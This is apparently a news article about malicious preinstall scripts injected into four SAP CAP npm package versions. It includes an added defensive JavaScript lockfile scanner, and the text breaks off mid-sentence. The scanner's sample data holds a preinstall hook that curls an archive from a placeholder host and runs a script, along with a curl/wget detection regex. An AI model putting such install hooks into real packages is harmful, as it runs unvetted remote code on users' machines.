
SAP NPM Packages Targeted in Supply Chain Attack


Four SAP NPM packages have been injected with malicious code as part of a new supply chain attack, security researchers warn.

The campaign, referred to as Mini Shai-Hulud, is targeting packages linked to the SAP Cloud Application Programming (CAP) ecosystem and SAP cloud deployment workflows.

On April 29, four package versions were flagged as malicious: mbt 1.2.48, @cap-js/db-service 2.10.1, @cap-js/postgres 2.2.2, and @cap-js/sqlite 2.2.2.

Together these packages see over 500,000 weekly downloads: mbt is SAP’s Cloud MTA Build Tool for building Multi-Target Application archives, and the @cap-js packages are database service packages for CAP software.

According to Socket, the malicious versions were injected with a preinstall script that acts as a runtime bootstrapper. When npm runs it during installation, the script fetches a ZIP archive of the Bun runtime from a GitHub repository, extracts it, and executes the bundled Bun binary.
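Because the bootstrapper runs from an npm install hook, one defensive check is to audit a project's lockfile for the four flagged versions and to list any dependency whose install-time hooks are present at all, marking those that download something inline. The following is an added example, not code from the article or from SAP, Socket or Onapsis; the lockfile and package.json it scans are constructed samples.

```javascript
// The four package versions flagged on April 29 (name -> set of versions).
const FLAGGED = new Map([
  ["mbt", new Set(["1.2.48"])],
  ["@cap-js/db-service", new Set(["2.10.1"])],
  ["@cap-js/postgres", new Set(["2.2.2"])],
  ["@cap-js/sqlite", new Set(["2.2.2"])],
]);
// Hooks npm runs on its own during install; the bootstrapper used preinstall.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Heuristic for an inline download. A hook that only runs a local file
// ("node setup.js") hides the fetch, so every install hook is reported anyway.
const INLINE_REMOTE = /https?:\/\/|\bcurl\b|\bwget\b/i;
// "node_modules/a/node_modules/@cap-js/sqlite" -> "@cap-js/sqlite"
function nameFromLockPath(lockPath) {
  const i = lockPath.lastIndexOf("node_modules/");
  return i === -1 ? lockPath : lockPath.slice(i + "node_modules/".length);
}

// Every installed entry in a package-lock.json ("packages" map, lockfile v2/v3)
// whose name and version match a flagged release, nested installs included.
function findFlaggedVersions(lock) {
  const hits = [];
  for (const [lockPath, entry] of Object.entries(lock.packages || {})) {
    if (lockPath === "") continue; // the root project itself
    const name = entry.name || nameFromLockPath(lockPath);
    if (FLAGGED.get(name)?.has(entry.version)) {
      hits.push({ path: lockPath, name, version: entry.version });
    }
  }
  return hits;
}

// Install hooks declared in one dependency's package.json, marking inline fetches.
function installHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === "string")
    .map((h) => ({ hook: h, script: scripts[h], remote: INLINE_REMOTE.test(scripts[h]) }));
}

// Constructed samples (not real captures) so the block runs stand-alone.
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  "": { name: "my-app", version: "1.0.0" },
  "node_modules/@cap-js/sqlite": { version: "2.2.2" },
  "node_modules/@cap-js/postgres": { version: "2.2.1" },
  "node_modules/foo/node_modules/mbt": { version: "1.2.48" },
} };
const SAMPLE_PKG = { name: "constructed-dep", scripts: {
  preinstall: "curl -sL https://example.invalid/bun.zip -o bun.zip && node run.js",
  test: "jest",
} };
console.log(findFlaggedVersions(SAMPLE_LOCK), installHooks(SAMPLE_PKG));
```

Installing with `npm ci --ignore-scripts` prevents these hooks from executing at all, which is the blunt mitigation for this class of install-time bootstrapper.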

According to Onapsis, the malicious package versions ...


Copyright of this story belongs to SecurityWeek.